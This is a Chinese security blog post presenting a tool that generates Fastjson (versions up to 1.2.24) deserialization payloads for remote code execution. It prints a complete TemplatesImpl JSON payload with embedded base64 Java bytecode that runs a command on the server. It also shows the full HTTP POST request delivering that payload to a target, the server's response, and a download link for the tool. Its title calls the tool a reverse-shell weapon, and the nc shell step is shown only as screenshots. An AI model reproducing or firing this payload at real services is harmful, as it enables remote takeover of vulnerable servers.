【漏洞利用】Fastjson 反序列化漏洞反弹Shell利器

漏洞描述1.漏洞分析https://www.secfree.com/article-590.html使用Fastjson反序列化漏洞利用工具生成Payload进行RCE攻击2.运行Poc Fastjson-Payload.jar##################################################################### #  &n...

漏洞描述

1.漏洞分析

https://www.secfree.com/article-590.html

使用Fastjson反序列化漏洞利用工具生成Payload进行RCE攻击

2.运行Poc Fastjson-Payload.jar

#####################################################################
#                                                                   #
#                       Fastjson 反序列化 RCE                       #
#                                                                   #
#                          www.secfree.com                          #
#                                                                   #
#####################################################################

[*] Usage: java -jar Fastjson-Payload.jar --use 20170315
         20170315 => {[fastjson <= 1.2.24] [https://github.com/alibaba/fastjson/wiki/security_update_20170315]}

3.使用模块20170315 生成Payload

PS C:\Users\Bearcat\Desktop> java -jar .\Fastjson-Payload.jar -use 20170315

[+] Usage => [fastjson <= 1.2.24]
[+] Generate Payload

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQArAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEACGNhbGMuZXhlCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4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"],"_name":"shit","_tfactory":{},"_outputProperties":{}}

4.配合BurpSuite进行反序列化攻击

HTTP请求包:

POST /fastjson-1.0/ HTTP/1.1
Host: 192.168.0.104:8887
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 5369

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQArAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEACGNhbGMuZXhlCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4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"],"_name":"shit","_tfactory":{},"_outputProperties":{}}

HTTP返回包

HTTP/1.1 500 
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Dec 2017 15:09:36 GMT
Connection: close
Content-Length: 53500 Internal Error

5.成功执行命令

20171202232515.gif

6.使用nc反弹Shell

payload-shell.png

20171203185630.gif

7.下载地址

https://github.com/iBearcat/Fastjson-Payload

文章版权归原作者所有,转载需取得作者本人同意 并注明出处:http://www.secfree.com/article-591.html

联系我们

邮件:[email protected]